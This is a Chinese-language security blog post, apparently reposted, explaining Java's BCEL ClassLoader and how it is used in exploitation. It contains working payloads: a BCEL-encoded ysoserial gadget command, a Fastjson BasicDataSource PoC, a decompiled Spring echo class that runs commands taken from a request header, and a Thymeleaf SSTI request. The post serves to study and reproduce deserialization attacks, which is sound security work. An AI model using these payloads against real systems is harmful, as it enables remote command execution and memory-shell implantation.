Python微信訂餐小程序課程視頻

https://edu.csdn.net/course/detail/36074

Python實戰量化交易理財系統

https://edu.csdn.net/course/detail/35475

目錄

• Java安全之BCEL ClassLoader
  • 寫在前面
  • About BCEL
  • 調試分析
  • 食用姿勢
    • Fuzz反序列化Gadget
    • Fastjson BCEL Payload
    • Thymeleaf SSTI Payload

Java安全之BCEL ClassLoader

寫在前面

BCEL平常在測試反序列化的時候也經常會用到，比如延時測Gadget以及在某些場景下執行命令不是那么順手的情況下選擇BCEL去打內存馬，就像Fastjson和Thymeleaf SSTI這種。以前也只是用到這個BCEL但是沒有仔細學習過，下面簡單學習記錄下BCEL。

About BCEL

BCEL Classloader在 JDK < 8u251之前是在rt.jar里面。
同時在Tomcat中也會存在相關的依賴
tomcat7

org.apache.tomcat.dbcp.dbcp.BasicDataSource

tomcat8及其以后

org.apache.tomcat.dbcp.dbcp2.BasicDataSource

而在rt.jar!/com/sun/org/apache/bcel/internal/util/包下，有Classloader這么一個類，可以實現加載字節碼并初始化一個類的功能，該類也是個Classloader（繼承了原生的Classloader類）重寫了loadClass()方法，源碼如下：

protected Class loadClass(String class\_name, boolean resolve)throws ClassNotFoundException{Class cl = null;/* First try: lookup hash table.*/if((cl=(Class)classes.get(class_name)) == null) {/* Second try: Load system class using system class loader. You better* don't mess around with them.*/for(int i=0; i < ignored_packages.length; i++) {if(class_name.startsWith(ignored_packages[i])) {cl = deferTo.loadClass(class_name);break;}}if(cl == null) {JavaClass clazz = null;/* Third try: Special request?*/if(class_name.indexOf("$$BCEL$$") >= 0)clazz = createClass(class_name);else { // Fourth try: Load classes via repositoryif ((clazz = repository.loadClass(class_name)) != null) {clazz = modifyClass(clazz);}elsethrow new ClassNotFoundException(class_name);}if(clazz != null) {byte[] bytes = clazz.getBytes();cl = defineClass(class_name, bytes, 0, bytes.length);} else // Fourth try: Use default class loadercl = Class.forName(class_name);}if(resolve)resolveClass(cl);}classes.put(class_name, cl);return cl;}

首先會判斷類名是否以$$BCEL$$開頭，之后調用createClass()方法拿到一個JavaClass對象最終通過defineClass()加載字節碼還原類。

調試分析

先來看下簡單的使用，在同一包下，準備一個惡意類

package MemoryShell.BCEL;import java.io.IOException;public class calc {static{try {Runtime.getRuntime().exec("open -a Calculator");} catch (IOException e) {e.printStackTrace();}} }

準備一個BCEL的demo,運行即可。

package MemoryShell.BCEL;import com.sun.org.apache.bcel.internal.Repository; import com.sun.org.apache.bcel.internal.classfile.JavaClass; import com.sun.org.apache.bcel.internal.classfile.Utility; import com.sun.org.apache.bcel.internal.util.ClassLoader;public class BCELDemo {public static void main(String[] args) throws Exception {JavaClass cls = Repository.lookupClass(calc.class);String code = Utility.encode(cls.getBytes(), true);System.out.println(code);new ClassLoader().loadClass("$$BCEL$$" + code).newInstance();} }

下面來調試一下，直接跟到loadClass()方法里，首先是去調用createClass()方法

在createClass()中,通過subString()截取$$BCEL$$后的字符串，并調用Utility.decode進行相應的解碼并最終返回改字節碼的bytes數組(decode方法參數uncompress用來標識是否為zip流，當為true時走zip流解碼)。之后生成Parser解析器并調用parse()方法進行解析，并生成JavaClass對象
createClass源碼如下：

protected JavaClass createClass(String class\_name) {int index = class_name.indexOf("$$BCEL$$");String real\_name = class_name.substring(index + 8);JavaClass clazz = null;try {byte[] bytes = Utility.decode(real_name, true);ClassParser parser = new ClassParser(new ByteArrayInputStream(bytes), "foo");clazz = parser.parse();} catch(Throwable e) {e.printStackTrace();return null;}// Adapt the class name to the passed valueConstantPool cp = clazz.getConstantPool();ConstantClass cl = (ConstantClass)cp.getConstant(clazz.getClassNameIndex(),Constants.CONSTANT_Class);ConstantUtf8 name = (ConstantUtf8)cp.getConstant(cl.getNameIndex(),Constants.CONSTANT_Utf8);name.setBytes(class_name.replace('.', '/'));return clazz;}

Utility.decode()源碼：

/** Decode a string back to a byte array.** @param bytes the byte array to convert* @param uncompress use gzip to uncompress the stream of bytes*/public static byte[] decode(String s, boolean uncompress) throws IOException {char[] chars = s.toCharArray();CharArrayReader car = new CharArrayReader(chars);JavaReader jr = new JavaReader(car);ByteArrayOutputStream bos = new ByteArrayOutputStream();int ch;while((ch = jr.read()) >= 0) {bos.write(ch);}bos.close();car.close();jr.close();byte[] bytes = bos.toByteArray();if(uncompress) {GZIPInputStream gis = new GZIPInputStream(new ByteArrayInputStream(bytes));byte[] tmp = new byte[bytes.length * 3]; // Rough estimateint count = 0;int b;while((b = gis.read()) >= 0)tmp[count++] = (byte)b;bytes = new byte[count];System.arraycopy(tmp, 0, bytes, 0, count);}return bytes;}

之后獲取到了該JavaClass對象的bytes數組并調用java原生的defineClass()加載

之后就是在newInstance()時初始化觸發靜態代碼塊執行

食用姿勢

Fuzz反序列化Gadget

以測試CC3為例，使用c0ny1師傅的ysoserial-for-woodpecker項目，先準備一個可以延時的類

package MemoryShell.BCEL;public class sleep {static {try {Thread.sleep(1000);} catch (InterruptedException e) {e.printStackTrace();}} }

yso

/Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home/bin/java -jar ysoserial-for-woodpecker-0.5.0.jar -g CommonsCollections3 -a bcel:$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$7dRMK$c3$40$Q$7d$db$sM$h$a3$adUk$fd$fe$b8$a8$3d$Y$f0$aaxP$U$aa$a9$kZz$U$b6$e9b$a3i$S$d6T$f4$Xy$eeE$c5$83$3f$c0$l$r$ce$aeU$R$c4$81$9da$de$ec$bc$f7X$f6$ed$fd$e5$V$c0$O$d6m$e41kB$c7F$c9F$Vs$W$e6m$98X$b0$b0ha$89$n$b7$XDA$ba$cf$90$dd$dcj3$Y$87qW0$U$bd$m$Sg$83$7eG$c8$W$ef$84$84$94$bd$d8$e7a$9b$cb$40$f5$p$d0H$7b$c1$NC$d5k$88$7e$y$ef$9b$3d$R$86$ee$c1$e1$91$e7$de$84B$q$bb$M$f9$3d$3f$i$J0ZX$f5$ae$f8$zwC$k$5d$ba$f5$u$VR$O$92Tt$8f$ee$7c$91$a4A$i$d1$c6x3$e5$feu$83$tZ$83$ec2$d8$cdx$m$7dq$i$uM$5bSo$x$k$H$F$d8$W$96$j$ac$60$95a$f9$7fn$Hk$b0$Z$w$7f$7be$u$fd$ac$9fw$ae$84$9f$fe$82Z$3d$vx$97$c1$i$dd66O$d4$7b$V$T$ZD$a9$b6$dc$92$dc$X$a4a$d1$a3$ab$c8$80$v$7f$94$c7$a8s$a92$aaf$ed$Jl$a8$c7$O$e5$9c$G$b3$Y$a7$ec$7c$5e$c0$E$8aT$f3$u$7d$\_\_h2$a08$8d$cc3$8c$H$e4Ok$8f$c8$N5$98$p$V$93$u$U$5d$F$a6F$UV$m$t$ea$DLP$fe$a2$b7a$60$Se$ea$a6$e8X$c8$d4$zL$h4$98$d1$8e$w$l$84$cfe$82$3b$C$A$A

當然也可以用c0ny1師傅提到的通過class去Fuzz Gadget，這個也被集成到了他最新版本的yso中（吹爆）

Fastjson BCEL Payload

這個也是老生常談的東西了，這里就簡單記錄下自己在復現時遇到的一點小bug。
PoC

{{"x":{"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$..."}}: "x" }

回顯

Content-Type: application/json cmd: whoami Content-Length: 3327{{"@type": "com.alibaba.fastjson.JSONObject","x":{"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$\_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c\_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$\_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$\_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$\_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V\_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}}: "x" }

測試的時候拋出了異常

打個斷點，異常出在createDriver方法，我們跟進去看下，順便看一下這里是如何去利用BCEL Classloader的

static Driver createDriver(BasicDataSource basicDataSource) throws SQLException {Driver driverToUse = basicDataSource.getDriver();String driverClassName = basicDataSource.getDriverClassName();ClassLoader driverClassLoader = basicDataSource.getDriverClassLoader();String url = basicDataSource.getUrl();if (driverToUse == null) {Class driverFromCCL = null;String message;if (driverClassName != null) {try {try {if (driverClassLoader == null) {driverFromCCL = Class.forName(driverClassName);} else {driverFromCCL = Class.forName(driverClassName, true, driverClassLoader);}} catch (ClassNotFoundException var8) {driverFromCCL = Thread.currentThread().getContextClassLoader().loadClass(driverClassName);}} catch (Exception var9) {message = "Cannot load JDBC driver class '" + driverClassName + "'";basicDataSource.log(message, var9);throw new SQLException(message, var9);}}try {if (driverFromCCL == null) {driverToUse = DriverManager.getDriver(url);} else {driverToUse = (Driver)driverFromCCL.getConstructor().newInstance();if (!driverToUse.acceptsURL(url)) {throw new SQLException("No suitable driver", "08001");}}} catch (Exception var10) {message = "Cannot create JDBC driver of class '" + (driverClassName != null ? driverClassName : "") + "' for connect URL '" + url + "'";basicDataSource.log(message, var10);throw new SQLException(message, var10);}}return driverToUse;} }

最終會走到Class.forName(driverClassName, true, driverClassLoader); ，這個點在C3P0有提到過，當這里設置為true時，如果沒有初始化過目標類，則會將其初始化。而繼續單步調試時就跟不進去了，不過可以看到已經拋出了異常。這里拋出的是沒有找到Spring中RequestContextHolder類的異常，因為測試環境是沒有用到Spring的。這里猜測可能是safe6sec師傅這個回顯的poc是Spring下的回顯。

也可以把BCEL字段拿出來，decode一下還原成class文件，看一看代碼
還原代碼如下：

public class BCELDemo {public static void main(String[] args) throws Exception {byte[] bytes = BCELDecode(FJ_BCEL_ECHO_1_2_24);getFileByByte(bytes,"aa.class", "/test");}public static byte[] BCELDecode(String BCELcode) throws IOException {int index = BCELcode.indexOf("$$BCEL$$");String real\_name = BCELcode.substring(index + 8);return Utility.decode(real_name, true);}public static void getFileByByte (byte[] bytes, String fileName, String filePath){BufferedOutputStream bos = null;FileOutputStream fos = null;File file = null;try {file = new File(filePath + "/" + fileName);fos = new FileOutputStream(file);bos = new BufferedOutputStream(fos);bos.write(bytes);} catch (FileNotFoundException e) {e.printStackTrace();} catch (IOException e) {e.printStackTrace();} finally {if (bos != null){try {bos.close();} catch (IOException e) {e.printStackTrace();}}if (fos != null){try {fos.close();} catch (IOException e) {e.printStackTrace();}}}} }

反編譯class得到代碼如下：

package com.fastjson.vul;import java.lang.reflect.Method; import java.util.Scanner;public class SpringEcho {public SpringEcho() {}static {try {Class var0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");Method var1 = var0.getMethod("getRequestAttributes");Object var2 = var1.invoke((Object)null);var0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");var1 = var0.getMethod("getResponse");Method var3 = var0.getMethod("getRequest");Object var4 = var1.invoke(var2);Object var5 = var3.invoke(var2);Method var6 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");Method var7 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader", String.class);var7.setAccessible(true);var6.setAccessible(true);Object var8 = var6.invoke(var4);String var9 = (String)var7.invoke(var5, "cmd");String[] var10 = new String[3];if (System.getProperty("os.name").toUpperCase().contains("WIN")) {var10[0] = "cmd";var10[1] = "/c";} else {var10[0] = "/bin/sh";var10[1] = "-c";}var10[2] = var9;var8.getClass().getDeclaredMethod("println", String.class).invoke(var8, (new Scanner(Runtime.getRuntime().exec(var10).getInputStream())).useDelimiter("\\A").next());var8.getClass().getDeclaredMethod("flush").invoke(var8);var8.getClass().getDeclaredMethod("close").invoke(var8);} catch (Exception var11) {}} }

所以如果環境沒有Spring時換成TomcatEcho的payload丟進去就可以了

Thymeleaf SSTI Payload

這個場景如果可以用BCEL就會很方便，比如可以直接去打內存馬、reg等進去。
參考的turn1tup師傅文章

poc: Mac Calc

POST /path HTTP/1.1 Host: 127.0.0.1:8090 Content-Type: application/x-www-form-urlencoded Content-Length: 1010lang=::__${"".getClass().forName("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQ$cbN$db$40$U$3d$938$b1c$9c$G$C$BZ$fa$I$ef$80$E$96$d8$82X$QQ$a9$aa$81$aaAt$3d$ZFa$c0$f1D$ce$E$c1$X$b1f$D$88$F$l$c0G$n$ee$98$94$o$VK$9e$fb$3c$e7$9e$3b$f3$f8t$ff$A$60$DK$3e$3cL$f9$98$c6G$P$9f$ac$9dq$f1$d9G$B\_$5c$7cu$f1$8d$a1$b8$a5$Se$b6$Z$f2$8d$95$p$G$a7$a9$8f$rC$rR$89$dc$lt$db2$3d$e4$ed$982$d5H$L$k$l$f1T$d9x$98t$cc$89$ea3LE$7b$b2$ab$d3$cb$d6$89$8c$e3p$a7$b9$h$85$d4$x6$Z$bc$z$R$P$f9$Z$f5$d7$a2S$7e$ceC$a5$c3$l$H$bb$XB$f6$8c$d2$J$b5$95$5b$86$8b$b3$3d$de$cbxI$o$83$df$d2$83T$c8$ef$ca$ce$vY$bau$8b$NP$82$ef$a2$k$60$Ws$a4J$f7dR\_$e3$f5$s5$Mbnt$g$60$k$L$M$e3$efL$K$b0$I$9fT$bc$ab$96a4$83$c4$3c$e9$84$H$edS$v$M$c3$d8$bf$d4$efAbT$97$c4$f8$ji$5e$83Zc$r$fa$af$876r$e4$85$q$ca$e5$c6$9bj$cb$a4$w$e9l$be$F$fcJ$b5$90$fd$3e$B$w$3d$w$9a$ec$k$OS$$$q$ed$e7$d2$e3$d9$\_$Hf$b7$a6s$84$a2$90$y$p$5bX$bd$F$bb$ce$ca$B$9d$c5$97$q$cat$GC$ff$D$wd$3d$8c$be$82yF$GT$ef$90$ab$e6o$e0$fc$b9$82$f7s$f5$G$c5$eb$y\_$ol$B$f9$8cq$92$3c$8b$$$R$d2$5e$7b$99X$c6$c8$fb$3b$a1$M$87$e2$wE$e3$f4$bb$c8E$$$s$i$w$d42Q$93$cfC$e1$98g$86$C$A$A", true, "".getClass().forName("com.sun.org.apache.bcel.internal.util.ClassLoader").newInstance())}_______________

總結

以上是生活随笔為你收集整理的Java安全之BCEL ClassLoader的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。